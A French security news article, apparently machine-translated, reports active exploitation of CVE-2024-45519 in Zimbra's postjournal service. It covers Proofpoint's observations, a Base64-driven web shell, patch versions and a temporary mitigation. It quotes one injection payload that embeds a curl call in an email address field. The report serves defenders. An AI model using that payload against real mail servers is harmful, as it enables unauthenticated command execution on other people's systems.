Les chercheurs en cybersécurité mettent en garde contre des tentatives d’exploitation actives ciblant une faille de sécurité récemment révélée dans la collaboration Zimbra de Synacor.
La société de sécurité d’entreprise Proofpoint a déclaré avoir commencé à observer l’activité à partir du 28 septembre 2024. Les attaques cherchent à exploiter CVE-2024-45519une grave faille de sécurité dans le service postjournal de Zimbra qui pourrait permettre à des attaquants non authentifiés d’exécuter des commandes arbitraires sur les installations affectées.
« Les e-mails usurpant Gmail ont été envoyés à de fausses adresses dans les champs CC dans le but que les serveurs Zimbra les analysent et les exécutent sous forme de commandes », Proofpoint dit dans une série d’articles sur X. « Les adresses contenaient des chaînes Base64 exécutées avec l’utilitaire sh. »
Le problème critique a été abordé par Zimbra dans versions 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 et 10.1.1 publié le 4 septembre 2024. Un chercheur en sécurité nommé lebr0nli (Alan Li) a été reconnu pour avoir découvert et signalé la lacune.
« Bien que la fonctionnalité postjournal puisse être facultative ou non activée sur la plupart des systèmes, il est toujours nécessaire d’appliquer le correctif fourni pour empêcher toute exploitation potentielle », Ashish Kataria, ingénieur architecte de sécurité chez Synacor, noté dans un commentaire du 19 septembre 2024.
« Pour les systèmes Zimbra où la fonctionnalité postjournal n’est pas activée et où le correctif ne peut pas être appliqué immédiatement, la suppression du binaire postjournal pourrait être considérée comme une mesure temporaire jusqu’à ce que le correctif puisse être appliqué. »
Proofpoint a déclaré avoir identifié une série d’adresses en copie qui, une fois décodées, tentent d’écrire un shell Web sur un serveur Zimbra vulnérable à l’emplacement : « /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp ».
Le shell Web installé écoute ensuite les connexions entrantes avec un champ de cookie JSESSIONID prédéterminé et, s’il est présent, il analyse le cookie JACTION pour les commandes Base64.
Le shell Web est équipé de la prise en charge de l’exécution de commandes via exec. Alternativement, il peut également télécharger et exécuter un fichier via une connexion socket. Les attaques n’ont pas été attribuées à un acteur ou à un groupe menaçant connu au moment d’écrire ces lignes.
Cela dit, l’activité d’exploitation semble avoir commencé un jour après que Project Discovery ait publié les détails techniques de la faille, qui dit cela « provient d’une entrée utilisateur non nettoyée transmise à ouvrir dans la version non corrigée, permettant aux attaquants d’injecter des commandes arbitraires.
La société de cybersécurité a déclaré que le problème provenait de la manière dont le binaire postjournal basé sur C gère et analyse les adresses e-mail des destinataires dans une fonction appelée « msg_handler() », permettant ainsi l’injection de commandes sur le service exécuté sur le port 10027 lors du passage d’un SMTP spécialement conçu. message avec une fausse adresse (par exemple, « aabbb$(curl${IFS}oast.me) »@mail.domain.com).
À la lumière des tentatives d’exploitation actives, il est fortement recommandé aux utilisateurs d’appliquer les derniers correctifs pour une protection optimale contre les menaces potentielles.